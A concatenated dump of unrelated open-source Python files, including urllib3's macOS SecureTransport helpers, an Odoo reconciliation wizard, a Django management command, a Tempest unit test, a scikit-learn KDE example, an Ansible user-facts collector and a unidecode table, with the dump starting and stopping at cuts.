print(out)
else:
print('picard metric already exists')
g_counts = []
with open(hts_out, mode='r') as infile:
hts_tab = csv.reader(infile, delimiter = '\t')
print st
for l in hts_tab:
if st == 1:
gene_list.append(l[0])
g_counts.append(l[1])
st = 2
print len(g_counts)
print len(gene_list)
count_dict[cname] = g_counts
norm_read_dict[cname] = []
index3 = []
with open(picard_rnaseqmetric_out, mode='r') as infile:
pic_tab = csv.reader(infile, delimiter = '\t')
for i, l in enumerate(pic_tab):
if i == 6:
index1 = l
if i == 7:
num_stats = []
for n in l:
if n == '' or n == '?':
num_stats.append(0.0)
else:
num_stats.append(float(n))
picard_stats_dict[cname] = num_stats
if i == 10:
index2 = l
if i > 10 and i <= 111:
index3.append(int(l[0]))
norm_read_dict[cname].append(float(l[1]))
for k, v in norm_read_dict.items():
if len(v) == 0:
norm_read_dict[k] = [0 for x in range(101)]
print norm_read_dict[k], len(norm_read_dict[k])
print index3
#form pandas dataframe of each and save as tab delimited file
count_df = pd.DataFrame(count_dict, index = gene_list)
count_df.to_csv(os.path.join(path,'combined_spc_count_table.txt'), sep = '\t')
with open(os.path.join(path,'htseq_count_combined_spc.p'), 'wb') as fp1:
pickle.dump(count_df, fp1)
pic_stats_df = pd.DataFrame(picard_stats_dict, index = index1)
pic_stats_df.to_csv(os.path.join(path,'combined_spc_picard_stats.txt'), sep = '\t')
norm_read_df = pd.DataFrame(norm_read_dict, index = index3)
norm_read_df.to_csv(os.path.join(path,'combined_spc_read_bias.txt'), sep = '\t')
pd.DataFrame.plot(norm_read_df)
|
Dino0631/RedRain-Bot | refs/heads/develop | lib/urllib3/contrib/_securetransport/low_level.py | 136 | """
Low-level helpers for the SecureTransport bindings.
These are Python functions that are not directly related to the high-level APIs
but are necessary to get them to work. They include a whole bunch of low-level
CoreFoundation messing about and memory management. The concerns in this module
are almost entirely about trying to avoid memory leaks and providing
appropriate and useful assistance to the higher-level code.
"""
import base64
import ctypes
import itertools
import re
import os
import ssl
import tempfile
from .bindings import Security, CoreFoundation, CFConst
# This regular expression is used to grab PEM data out of a PEM bundle.
_PEM_CERTS_RE = re.compile(
b"-----BEGIN CERTIFICATE-----\n(.*?)\n-----END CERTIFICATE-----", re.DOTALL
)
def _cf_data_from_bytes(bytestring):
"""
Given a bytestring, create a CFData object from it. This CFData object must
be CFReleased by the caller.
"""
return CoreFoundation.CFDataCreate(
CoreFoundation.kCFAllocatorDefault, bytestring, len(bytestring)
)
def _cf_dictionary_from_tuples(tuples):
"""
Given a list of Python tuples, create an associated CFDictionary.
"""
dictionary_size = len(tuples)
# We need to get the dictionary keys and values out in the same order.
keys = (t[0] for t in tuples)
values = (t[1] for t in tuples)
cf_keys = (CoreFoundation.CFTypeRef * dictionary_size)(*keys)
cf_values = (CoreFoundation.CFTypeRef * dictionary_size)(*values)
return CoreFoundation.CFDictionaryCreate(
CoreFoundation.kCFAllocatorDefault,
cf_keys,
cf_values,
dictionary_size,
CoreFoundation.kCFTypeDictionaryKeyCallBacks,
CoreFoundation.kCFTypeDictionaryValueCallBacks,
)
def _cf_string_to_unicode(value):
"""
Creates a Unicode string from a CFString object. Used entirely for error
reporting.
Yes, it annoys me quite a lot that this function is this complex.
"""
value_as_void_p = ctypes.cast(value, ctypes.POINTER(ctypes.c_void_p))
string = CoreFoundation.CFStringGetCStringPtr(
value_as_void_p,
CFConst.kCFStringEncodingUTF8
)
if string is None:
buffer = ctypes.create_string_buffer(1024)
result = CoreFoundation.CFStringGetCString(
value_as_void_p,
buffer,
1024,
CFConst.kCFStringEncodingUTF8
)
if not result:
raise OSError('Error copying C string from CFStringRef')
string = buffer.value
if string is not None:
string = string.decode('utf-8')
return string
def _assert_no_error(error, exception_class=None):
"""
Checks the return code and throws an exception if there is an error to
report
"""
if error == 0:
return
cf_error_string = Security.SecCopyErrorMessageString(error, None)
output = _cf_string_to_unicode(cf_error_string)
CoreFoundation.CFRelease(cf_error_string)
if output is None or output == u'':
output = u'OSStatus %s' % error
if exception_class is None:
exception_class = ssl.SSLError
raise exception_class(output)
def _cert_array_from_pem(pem_bundle):
"""
Given a bundle of certs in PEM format, turns them into a CFArray of certs
that can be used to validate a cert chain.
"""
der_certs = [
base64.b64decode(match.group(1))
for match in _PEM_CERTS_RE.finditer(pem_bundle)
]
if not der_certs:
raise ssl.SSLError("No root certificates specified")
cert_array = CoreFoundation.CFArrayCreateMutable(
CoreFoundation.kCFAllocatorDefault,
0,
ctypes.byref(CoreFoundation.kCFTypeArrayCallBacks)
)
if not cert_array:
raise ssl.SSLError("Unable to allocate memory!")
try:
for der_bytes in der_certs:
certdata = _cf_data_from_bytes(der_bytes)
if not certdata:
raise ssl.SSLError("Unable to allocate memory!")
cert = Security.SecCertificateCreateWithData(
CoreFoundation.kCFAllocatorDefault, certdata
)
CoreFoundation.CFRelease(certdata)
if not cert:
raise ssl.SSLError("Unable to build cert object!")
CoreFoundation.CFArrayAppendValue(cert_array, cert)
CoreFoundation.CFRelease(cert)
    except Exception:
        # We need to free the array before the exception bubbles further.
        # We only want to do that if an error occurs: otherwise, the caller
        # should free.
        CoreFoundation.CFRelease(cert_array)
        raise
return cert_array
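def _example_cert_array_usage(pem_path):
    """
    Illustrative sketch only, not part of the upstream module: shows the
    ownership contract of _cert_array_from_pem. The path argument is
    hypothetical, and this can only run on macOS, where Security.framework
    is available.
    """
    with open(pem_path, 'rb') as f:
        trust_certs = _cert_array_from_pem(f.read())
    try:
        # The caller owns the returned CFArray...
        return CoreFoundation.CFArrayGetCount(trust_certs)
    finally:
        # ...and must therefore CFRelease it when done.
        CoreFoundation.CFRelease(trust_certs)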
def _is_cert(item):
"""
Returns True if a given CFTypeRef is a certificate.
"""
expected = Security.SecCertificateGetTypeID()
return CoreFoundation.CFGetTypeID(item) == expected
def _is_identity(item):
"""
Returns True if a given CFTypeRef is an identity.
"""
expected = Security.SecIdentityGetTypeID()
return CoreFoundation.CFGetTypeID(item) == expected
def _temporary_keychain():
"""
This function creates a temporary Mac keychain that we can use to work with
credentials. This keychain uses a one-time password and a temporary file to
store the data. We expect to have one keychain per socket. The returned
SecKeychainRef must be freed by the caller, including calling
SecKeychainDelete.
Returns a tuple of the SecKeychainRef and the path to the temporary
directory that contains it.
"""
# Unfortunately, SecKeychainCreate requires a path to a keychain. This
# means we cannot use mkstemp to use a generic temporary file. Instead,
# we're going to create a temporary directory and a filename to use there.
# This filename will be 8 random bytes expanded into base64. We also need
# some random bytes to password-protect the keychain we're creating, so we
# ask for 40 random bytes.
random_bytes = os.urandom(40)
filename = base64.b64encode(random_bytes[:8]).decode('utf-8')
password = base64.b64encode(random_bytes[8:]) # Must be valid UTF-8
tempdirectory = tempfile.mkdtemp()
keychain_path = os.path.join(tempdirectory, filename).encode('utf-8')
# We now want to create the keychain itself.
keychain = Security.SecKeychainRef()
status = Security.SecKeychainCreate(
keychain_path,
len(password),
password,
False,
None,
ctypes.byref(keychain)
)
_assert_no_error(status)
# Having created the keychain, we want to pass it off to the caller.
return keychain, tempdirectory
def _load_items_from_file(keychain, path):
"""
Given a single file, loads all the trust objects from it into arrays and
the keychain.
Returns a tuple of lists: the first list is a list of identities, the
second a list of certs.
"""
certificates = []
identities = []
result_array = None
with open(path, 'rb') as f:
raw_filedata = f.read()
try:
filedata = CoreFoundation.CFDataCreate(
CoreFoundation.kCFAllocatorDefault,
raw_filedata,
len(raw_filedata)
)
result_array = CoreFoundation.CFArrayRef()
result = Security.SecItemImport(
filedata, # cert data
None, # Filename, leaving it out for now
None, # What the type of the file is, we don't care
None, # what's in the file, we don't care
0, # import flags
None, # key params, can include passphrase in the future
keychain, # The keychain to insert into
ctypes.byref(result_array) # Results
)
_assert_no_error(result)
# A CFArray is not very useful to us as an intermediary
# representation, so we are going to extract the objects we want
# and then free the array. We don't need to keep hold of keys: the
# keychain already has them!
result_count = CoreFoundation.CFArrayGetCount(result_array)
for index in range(result_count):
item = CoreFoundation.CFArrayGetValueAtIndex(
result_array, index
)
item = ctypes.cast(item, CoreFoundation.CFTypeRef)
if _is_cert(item):
CoreFoundation.CFRetain(item)
certificates.append(item)
elif _is_identity(item):
CoreFoundation.CFRetain(item)
identities.append(item)
finally:
if result_array:
CoreFoundation.CFRelease(result_array)
CoreFoundation.CFRelease(filedata)
return (identities, certificates)
def _load_client_cert_chain(keychain, *paths):
"""
Load certificates and maybe keys from a number of files. Has the end goal
of returning a CFArray containing one SecIdentityRef, and then zero or more
SecCertificateRef objects, suitable for use as a client certificate trust
chain.
"""
# Ok, the strategy.
#
# This relies on knowing that macOS will not give you a SecIdentityRef
# unless you have imported a key into a keychain. This is a somewhat
# artificial limitation of macOS (for example, it doesn't necessarily
# affect iOS), but there is nothing inside Security.framework that lets you
# get a SecIdentityRef without having a key in a keychain.
#
# So the policy here is we take all the files and iterate them in order.
# Each one will use SecItemImport to have one or more objects loaded from
# it. We will also point at a keychain that macOS can use to work with the
# private key.
#
# Once we have all the objects, we'll check what we actually have. If we
# already have a SecIdentityRef in hand, fab: we'll use that. Otherwise,
# we'll take the first certificate (which we assume to be our leaf) and
# ask the keychain to give us a SecIdentityRef with that cert's associated
# key.
#
# We'll then return a CFArray containing the trust chain: one
# SecIdentityRef and then zero-or-more SecCertificateRef objects. The
# responsibility for freeing this CFArray will be with the caller. This
# CFArray must remain alive for the entire connection, so in practice it
# will be stored with a single SSLSocket, along with the reference to the
# keychain.
certificates = []
identities = []
# Filter out bad paths.
paths = (path for path in paths if path)
try:
for file_path in paths:
new_identities, new_certs = _load_items_from_file(
keychain, file_path
)
identities.extend(new_identities)
certificates.extend(new_certs)
# Ok, we have everything. The question is: do we have an identity? If
# not, we want to grab one from the first cert we have.
if not identities:
new_identity = Security.SecIdentityRef()
status = Security.SecIdentityCreateWithCertificate(
keychain,
certificates[0],
ctypes.byref(new_identity)
)
_assert_no_error(status)
identities.append(new_identity)
# We now want to release the original certificate, as we no longer
# need it.
CoreFoundation.CFRelease(certificates.pop(0))
# We now need to build a new CFArray that holds the trust chain.
trust_chain = CoreFoundation.CFArrayCreateMutable(
CoreFoundation.kCFAllocatorDefault,
0,
ctypes.byref(CoreFoundation.kCFTypeArrayCallBacks),
)
for item in itertools.chain(identities, certificates):
# ArrayAppendValue does a CFRetain on the item. That's fine,
# because the finally block will release our other refs to them.
CoreFoundation.CFArrayAppendValue(trust_chain, item)
return trust_chain
finally:
for obj in itertools.chain(identities, certificates):
CoreFoundation.CFRelease(obj)
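def _example_client_chain(cert_path, key_path=None):
    """
    Illustrative sketch only, not part of the upstream module: ties
    _temporary_keychain and _load_client_cert_chain together the way a
    higher-level TLS socket would. Paths are hypothetical; macOS-only.
    """
    import shutil
    keychain, tempdir = _temporary_keychain()
    trust_chain = None
    try:
        trust_chain = _load_client_cert_chain(keychain, cert_path, key_path)
        # In real use the CFArray (and the keychain) must stay alive for the
        # whole connection; here we only peek at it before tearing down.
        return CoreFoundation.CFArrayGetCount(trust_chain)
    finally:
        if trust_chain:
            CoreFoundation.CFRelease(trust_chain)
        Security.SecKeychainDelete(keychain)
        CoreFoundation.CFRelease(keychain)
        shutil.rmtree(tempdir)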
|
luoxufeiyan/python | refs/heads/master | NKUCodingCat/0003/0003.py | 40 | #coding=utf-8
# I don't have Redis installed, so this just follows the example code from
# the official site.
import os
import re
import redis
path = os.path.split(os.path.realpath(__file__))[0] + "/"
with open(path + "code.txt", "r") as f:
    A = f.read()
arr = re.split(r"\s+", A)
r = redis.Redis(host='localhost', port=6379, db=0)
for i, word in enumerate(arr):
    if i:  # keys start at 1; index 0 is skipped
        r.set(str(i), word)
r.save() |
fuselock/odoo | refs/heads/8.0 | addons/account/wizard/account_reconcile_partner_process.py | 385 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import fields, osv
class account_partner_reconcile_process(osv.osv_memory):
_name = 'account.partner.reconcile.process'
    _description = 'Reconciliation Process partner by partner'
def _get_to_reconcile(self, cr, uid, context=None):
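        # Count the partners that still have both unreconciled debit and
        # credit lines on reconcilable accounts and have not been reconciled
        # today yet; minus one because the current partner counts as done.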
cr.execute("""
SELECT p_id FROM (SELECT l.partner_id as p_id, SUM(l.debit) AS debit, SUM(l.credit) AS credit
FROM account_move_line AS l LEFT JOIN account_account a ON (l.account_id = a.id)
LEFT JOIN res_partner p ON (p.id = l.partner_id)
WHERE a.reconcile = 't'
AND l.reconcile_id IS NULL
AND (%s > to_char(p.last_reconciliation_date, 'YYYY-MM-DD') OR p.last_reconciliation_date IS NULL )
AND l.state <> 'draft'
GROUP BY l.partner_id) AS tmp
WHERE debit > 0
AND credit > 0
""",(time.strftime('%Y-%m-%d'),)
)
return len(map(lambda x: x[0], cr.fetchall())) - 1
def _get_today_reconciled(self, cr, uid, context=None):
cr.execute(
"SELECT l.partner_id " \
"FROM account_move_line AS l LEFT JOIN res_partner p ON (p.id = l.partner_id) " \
"WHERE l.reconcile_id IS NULL " \
"AND %s = to_char(p.last_reconciliation_date, 'YYYY-MM-DD') " \
"AND l.state <> 'draft' " \
"GROUP BY l.partner_id ",(time.strftime('%Y-%m-%d'),)
)
return len(map(lambda x: x[0], cr.fetchall())) + 1
def _get_partner(self, cr, uid, context=None):
move_line_obj = self.pool.get('account.move.line')
partner = move_line_obj.list_partners_to_reconcile(cr, uid, context=context)
if not partner:
return False
return partner[0][0]
def data_get(self, cr, uid, to_reconcile, today_reconciled, context=None):
return {'progress': (100 / (float(to_reconcile + today_reconciled) or 1.0)) * today_reconciled}
def default_get(self, cr, uid, fields, context=None):
res = super(account_partner_reconcile_process, self).default_get(cr, uid, fields, context=context)
if 'to_reconcile' in res and 'today_reconciled' in res:
data = self.data_get(cr, uid, res['to_reconcile'], res['today_reconciled'], context)
res.update(data)
return res
def next_partner(self, cr, uid, ids, context=None):
if context is None:
context = {}
move_line_obj = self.pool.get('account.move.line')
res_partner_obj = self.pool.get('res.partner')
partner_id = move_line_obj.read(cr, uid, context['active_id'], ['partner_id'])['partner_id']
if partner_id:
res_partner_obj.write(cr, uid, partner_id[0], {'last_reconciliation_date': time.strftime('%Y-%m-%d')}, context)
#TODO: we have to find a way to update the context of the current tab (we could open a new tab with the context but it's not really handy)
#TODO: remove that comments when the client side dev is done
return {'type': 'ir.actions.act_window_close'}
    _columns = {
        'to_reconcile': fields.float('Remaining Partners', readonly=True, help='This is the number of partners remaining for whom you should check if there is something to reconcile or not. This figure already counts the current partner as reconciled.'),
        'today_reconciled': fields.float('Partners Reconciled Today', readonly=True, help='This figure depicts the total number of partners that have gone through the reconciliation process today. The current partner is counted as already processed.'),
        'progress': fields.float('Progress', readonly=True, help='Shows you the progress made today on the reconciliation process. Given by \nPartners Reconciled Today / (Remaining Partners + Partners Reconciled Today)'),
        'next_partner_id': fields.many2one('res.partner', 'Next Partner to Reconcile', readonly=True, help='This field shows you the next partner that will be automatically chosen by the system to go through the reconciliation process, based on the latest day it has been reconciled.'), # TODO: remove the readonly=True when the client side allows updating the context of an existing tab, so that the user can change this value if they do not want to follow the OpenERP proposal
    }
_defaults = {
'to_reconcile': _get_to_reconcile,
'today_reconciled': _get_today_reconciled,
'next_partner_id': _get_partner,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
MFoster/breeze | refs/heads/master | django/core/management/commands/sqlall.py | 237 | from __future__ import unicode_literals
from optparse import make_option
from django.core.management.base import AppCommand
from django.core.management.sql import sql_all
from django.db import connections, DEFAULT_DB_ALIAS
class Command(AppCommand):
help = "Prints the CREATE TABLE, custom SQL and CREATE INDEX SQL statements for the given model module name(s)."
option_list = AppCommand.option_list + (
make_option('--database', action='store', dest='database',
default=DEFAULT_DB_ALIAS, help='Nominates a database to print the '
'SQL for. Defaults to the "default" database.'),
)
output_transaction = True
def handle_app(self, app, **options):
return '\n'.join(sql_all(app, self.style, connections[options.get('database')]))
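# Example invocation, from a project directory:
#   python manage.py sqlall myapp --database=default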
|
HybridF5/tempest_debug | refs/heads/master | tempest/tests/lib/services/compute/test_services_client.py | 6 | # Copyright 2015 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
from tempest.lib.services.compute import services_client
from tempest.tests.lib import fake_auth_provider
from tempest.tests.lib.services.compute import base
class TestServicesClient(base.BaseComputeServiceTest):
FAKE_SERVICES = {
"services":
[{
"status": "enabled",
"binary": "nova-conductor",
"zone": "internal",
"state": "up",
"updated_at": "2015-08-19T06:50:55.000000",
"host": "controller",
"disabled_reason": None,
"id": 1
}]
}
FAKE_SERVICE = {
"service":
{
"status": "enabled",
"binary": "nova-conductor",
"host": "controller"
}
}
def setUp(self):
super(TestServicesClient, self).setUp()
fake_auth = fake_auth_provider.FakeAuthProvider()
self.client = services_client.ServicesClient(
fake_auth, 'compute', 'regionOne')
def test_list_services_with_str_body(self):
self.check_service_client_function(
self.client.list_services,
'tempest.lib.common.rest_client.RestClient.get',
self.FAKE_SERVICES)
def test_list_services_with_bytes_body(self):
self.check_service_client_function(
self.client.list_services,
'tempest.lib.common.rest_client.RestClient.get',
self.FAKE_SERVICES, to_utf=True)
def _test_enable_service(self, bytes_body=False):
self.check_service_client_function(
self.client.enable_service,
'tempest.lib.common.rest_client.RestClient.put',
self.FAKE_SERVICE,
bytes_body,
            host_name="controller", binary="nova-conductor")
def test_enable_service_with_str_body(self):
self._test_enable_service()
def test_enable_service_with_bytes_body(self):
self._test_enable_service(bytes_body=True)
def _test_disable_service(self, bytes_body=False):
fake_service = copy.deepcopy(self.FAKE_SERVICE)
fake_service["service"]["status"] = "disable"
self.check_service_client_function(
self.client.disable_service,
'tempest.lib.common.rest_client.RestClient.put',
fake_service,
bytes_body,
            host_name="controller", binary="nova-conductor")
def test_disable_service_with_str_body(self):
self._test_disable_service()
def test_disable_service_with_bytes_body(self):
self._test_disable_service(bytes_body=True)
|
udrg/crazyflie-clients-python | refs/heads/develop | lib/cfclient/ui/widgets/hexspinbox.py | 7 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# || ____ _ __
# +------+ / __ )(_) /_______________ _____ ___
# | 0xBC | / __ / / __/ ___/ ___/ __ `/_ / / _ \
# +------+ / /_/ / / /_/ /__/ / / /_/ / / /_/ __/
# || || /_____/_/\__/\___/_/ \__,_/ /___/\___/
#
# Copyright (C) 2011-2013 Bitcraze AB
#
# Crazyflie Nano Quadcopter Client
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
This class provides a spin box for hexadecimal numbers of arbitrary length (i.e. not limited to 32 bits).
"""
__author__ = 'Bitcraze AB'
__all__ = ['HexSpinBox']
from PyQt4 import QtGui, QtCore
from PyQt4.QtGui import QAbstractSpinBox
class HexSpinBox(QAbstractSpinBox):
def __init__(self, *args):
QAbstractSpinBox.__init__(self, *args)
regexp = QtCore.QRegExp('^0x[0-9A-Fa-f]{1,10}$')
self.validator = QtGui.QRegExpValidator(regexp)
self._value = 0
def validate(self, text, pos):
return self.validator.validate(text, pos)
def textFromValue(self, value):
return "0x%X" % value
def valueFromText(self, text):
return int(str(text), 0)
def setValue(self, value):
self._value = value
self.lineEdit().setText(self.textFromValue(value))
def value(self):
self._value = self.valueFromText(self.lineEdit().text())
return self._value
def stepBy(self, steps):
self.setValue(self._value + steps)
def stepEnabled(self):
return QAbstractSpinBox.StepUpEnabled | QAbstractSpinBox.StepDownEnabled
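# Minimal standalone demo (not part of the client); assumes PyQt4 is installed.
if __name__ == "__main__":
    import sys
    app = QtGui.QApplication(sys.argv)
    box = HexSpinBox()
    box.setValue(0xBC)  # displayed as "0xBC"; the arrows step the value by one
    box.show()
    sys.exit(app.exec_())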
|
mayblue9/scikit-learn | refs/heads/master | examples/neighbors/plot_digits_kde_sampling.py | 251 | """
=========================
Kernel Density Estimation
=========================
This example shows how kernel density estimation (KDE), a powerful
non-parametric density estimation technique, can be used to learn
a generative model for a dataset. With this generative model in place,
new samples can be drawn. These new samples reflect the underlying model
of the data.
"""
import numpy as np
import matplotlib.pyplot as plt
from sklearn.datasets import load_digits
from sklearn.neighbors import KernelDensity
from sklearn.decomposition import PCA
from sklearn.grid_search import GridSearchCV
# load the data
digits = load_digits()
data = digits.data
# project the 64-dimensional data to a lower dimension
pca = PCA(n_components=15, whiten=False)
data = pca.fit_transform(digits.data)
# use grid search cross-validation to optimize the bandwidth
params = {'bandwidth': np.logspace(-1, 1, 20)}
grid = GridSearchCV(KernelDensity(), params)
grid.fit(data)
print("best bandwidth: {0}".format(grid.best_estimator_.bandwidth))
# use the best estimator to compute the kernel density estimate
kde = grid.best_estimator_
# sample 44 new points from the data
new_data = kde.sample(44, random_state=0)
new_data = pca.inverse_transform(new_data)
# turn data into a 4x11 grid
new_data = new_data.reshape((4, 11, -1))
real_data = digits.data[:44].reshape((4, 11, -1))
# plot real digits and resampled digits
fig, ax = plt.subplots(9, 11, subplot_kw=dict(xticks=[], yticks=[]))
for j in range(11):
ax[4, j].set_visible(False)
for i in range(4):
im = ax[i, j].imshow(real_data[i, j].reshape((8, 8)),
cmap=plt.cm.binary, interpolation='nearest')
im.set_clim(0, 16)
im = ax[i + 5, j].imshow(new_data[i, j].reshape((8, 8)),
cmap=plt.cm.binary, interpolation='nearest')
im.set_clim(0, 16)
ax[0, 5].set_title('Selection from the input data')
ax[5, 5].set_title('"New" digits drawn from the kernel density model')
plt.show()
|
ravibhure/ansible | refs/heads/devel | lib/ansible/module_utils/facts/system/user.py | 211 | # This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import getpass
import os
import pwd
from ansible.module_utils.facts.collector import BaseFactCollector
class UserFactCollector(BaseFactCollector):
name = 'user'
_fact_ids = set(['user_id', 'user_uid', 'user_gid',
'user_gecos', 'user_dir', 'user_shell',
'real_user_id', 'effective_user_id',
'effective_group_ids'])
def collect(self, module=None, collected_facts=None):
user_facts = {}
user_facts['user_id'] = getpass.getuser()
pwent = pwd.getpwnam(getpass.getuser())
user_facts['user_uid'] = pwent.pw_uid
user_facts['user_gid'] = pwent.pw_gid
user_facts['user_gecos'] = pwent.pw_gecos
user_facts['user_dir'] = pwent.pw_dir
user_facts['user_shell'] = pwent.pw_shell
user_facts['real_user_id'] = os.getuid()
user_facts['effective_user_id'] = os.geteuid()
user_facts['real_group_id'] = os.getgid()
        user_facts['effective_group_id'] = os.getegid()
return user_facts
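# Illustrative sketch, not upstream code: the collector can be exercised on
# its own, outside of a full Ansible run.
if __name__ == '__main__':
    import json
    print(json.dumps(UserFactCollector().collect(), indent=2))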
|
yvan-sraka/wprevents | refs/heads/master | vendor-local/lib/python/unidecode/x089.py | 252 | data = (
'Ji ', # 0x00
'Zhi ', # 0x01
'Gua ', # 0x02
'Ken ', # 0x03
'Che ', # 0x04
'Ti ', # 0x05
'Ti ', # 0x06
'Fu ', # 0x07
'Chong ', # 0x08
'Xie ', # 0x09
'Bian ', # 0x0a
'Die ', # 0x0b
'Kun ', # 0x0c
'Duan ', # 0x0d
'Xiu ', # 0x0e
'Xiu ', # 0x0f
'He ', # 0x10
'Yuan ', # 0x11
'Bao ', # 0x12
'Bao ', # 0x13
'Fu ', # 0x14
'Yu ', # 0x15
'Tuan ', # 0x16
'Yan ', # 0x17
'Hui ', # 0x18
'Bei ', # 0x19
'Chu ', # 0x1a
'Lu ', # 0x1b
'Ena ', # 0x1c
'Hitoe ', # 0x1d
'Yun ', # 0x1e
'Da ', # 0x1f
'Gou ', # 0x20
'Da ', # 0x21
'Huai ', # 0x22
'Rong ', # 0x23
'Yuan ', # 0x24
'Ru ', # 0x25
'Nai ', # 0x26
'Jiong ', # 0x27
'Suo ', # 0x28
'Ban ', # 0x29
'Tun ', # 0x2a
'Chi ', # 0x2b
'Sang ', # 0x2c
'Niao ', # 0x2d
'Ying ', # 0x2e
'Jie ', # 0x2f
'Qian ', # 0x30
'Huai ', # 0x31
'Ku ', # 0x32
'Lian ', # 0x33
'Bao ', # 0x34
'Li ', # 0x35
'Zhe ', # 0x36
'Shi ', # 0x37
'Lu ', # 0x38
'Yi ', # 0x39
'Die ', # 0x3a
'Xie ', # 0x3b
'Xian ', # 0x3c
'Wei ', # 0x3d
'Biao ', # 0x3e
'Cao ', # 0x3f
'Ji ', # 0x40
'Jiang ', # 0x41
'Sen ', # 0x42
'Bao ', # 0x43
'Xiang ', # 0x44
'Chihaya ', # 0x45
'Pu ', # 0x46
'Jian ', # 0x47
'Zhuan ', # 0x48
'Jian ', # 0x49
'Zui ', # 0x4a
'Ji ', # 0x4b
'Dan ', # 0x4c
'Za ', # 0x4d
'Fan ', # 0x4e
'Bo ', # 0x4f
'Xiang ', # 0x50
'Xin ', # 0x51
'Bie ', # 0x52
'Rao ', # 0x53
'Man ', # 0x54
'Lan ', # 0x55
'Ao ', # 0x56
'Duo ', # 0x57
'Gui ', # 0x58
'Cao ', # 0x59
'Sui ', # 0x5a
'Nong ', # 0x5b
'Chan ', # 0x5c
'Lian ', # 0x5d
'Bi ', # 0x5e
'Jin ', # 0x5f
'Dang ', # 0x60
'Shu ', # 0x61
'Tan ', # 0x62
'Bi ', # 0x63
'Lan ', # 0x64
'Pu ', # 0x65
'Ru ', # 0x66
'Zhi ', # 0x67
'[?] ', # 0x68
'Shu ', # 0x69
'Wa ', # 0x6a
'Shi ', # 0x6b
'Bai ', # 0x6c
'Xie ', # 0x6d
'Bo ', # 0x6e
'Chen ', # 0x6f
'Lai ', # 0x70
'Long ', # 0x71
'Xi ', # 0x72
'Xian ', # 0x73
'Lan ', # 0x74
'Zhe ', # 0x75
'Dai ', # 0x76
'Tasuki ', # 0x77
'Zan ', # 0x78
'Shi ', # 0x79
'Jian ', # 0x7a
'Pan ', # 0x7b
'Yi ', # 0x7c
'Ran ', # 0x7d
'Ya ', # 0x7e
'Xi ', # 0x7f
'Xi ', # 0x80
'Yao ', # 0x81
'Feng ', # 0x82
'Tan ', # 0x83
'[?] ', # 0x84
'Biao ', # 0x85
'Fu ', # 0x86
'Ba ', # 0x87
'He ', # 0x88
'Ji ', # 0x89
'Ji ', # 0x8a
'Jian ', # 0x8b
'Guan ', # 0x8c
'Bian ', # 0x8d
'Yan ', # 0x8e
'Gui ', # 0x8f
'Jue ', # 0x90
'Pian ', # 0x91
'Mao ', # 0x92
'Mi ', # 0x93
'Mi ', # 0x94
'Mie ', # 0x95
'Shi ', # 0x96
'Si ', # 0x97
'Zhan ', # 0x98
'Luo ', # 0x99
'Jue ', # 0x9a
'Mi ', # 0x9b
'Tiao ', # 0x9c
'Lian ', # 0x9d
'Yao ', # 0x9e
'Zhi ', # 0x9f
'Jun ', # 0xa0
'Xi ', # 0xa1
'Shan ', # 0xa2
'Wei ', # 0xa3
'Xi ', # 0xa4
'Tian ', # 0xa5
'Yu ', # 0xa6
'Lan ', # 0xa7
'E ', # 0xa8
'Du ', # 0xa9
'Qin ', # 0xaa
'Pang ', # 0xab
'Ji ', # 0xac
'Ming ', # 0xad
'Ying ', # 0xae
'Gou ', # 0xaf
'Qu ', # 0xb0
'Zhan ', # 0xb1
'Jin ', # 0xb2
'Guan ', # 0xb3
'Deng ', # 0xb4
'Jian ', # 0xb5
'Luo ', # 0xb6
'Qu ', # 0xb7
'Jian ', # 0xb8
'Wei ', # 0xb9
'Jue ', # 0xba
'Qu ', # 0xbb
'Luo ', # 0xbc
'Lan ', # 0xbd
'Shen ', # 0xbe
'Di ', # 0xbf
'Guan ', # 0xc0
'Jian ', # 0xc1
'Guan ', # 0xc2
'Yan ', # 0xc3
'Gui ', # 0xc4
'Mi ', # 0xc5
'Shi ', # 0xc6
'Zhan ', # 0xc7
'Lan ', # 0xc8
'Jue ', # 0xc9
'Ji ', # 0xca
'Xi ', # 0xcb
'Di ', # 0xcc
'Tian ', # 0xcd
'Yu ', # 0xce
'Gou ', # 0xcf
'Jin ', # 0xd0
'Qu ', # 0xd1
'Jiao ', # 0xd2
'Jiu ', # 0xd3
'Jin ', # 0xd4
'Cu ', # 0xd5
'Jue ', # 0xd6
'Zhi ', # 0xd7
